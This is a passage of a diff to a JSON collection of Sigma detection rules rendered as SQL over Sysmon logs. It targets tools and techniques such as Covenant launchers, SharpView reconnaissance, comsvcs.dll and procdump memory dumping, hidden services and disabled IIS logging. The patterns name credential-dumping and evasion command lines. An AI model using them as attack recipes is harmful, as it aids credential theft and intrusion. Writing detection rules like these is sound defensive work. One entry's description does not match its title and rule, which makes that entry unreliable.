((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", - "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "status": "experimental", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1564.003" + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "status": "experimental", - "description": "Detects a Windows program executable started from a suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "status": "test", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Exotic software" + "Unlikely, because no one should dump the process memory in that way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", - "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, Florian Roth", + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate administration activity" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE '% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE '\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", - "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", - "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "status": "experimental", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "status": "experimental", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", "status": "stable", - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", - "author": "frack113", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "status": "experimental", + "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", "tags": [ - "attack.collection", - "attack.t1005" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ - "Unknown" + "Other programs that cause these patterns (please report)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "status": "test", + "description": "Detects 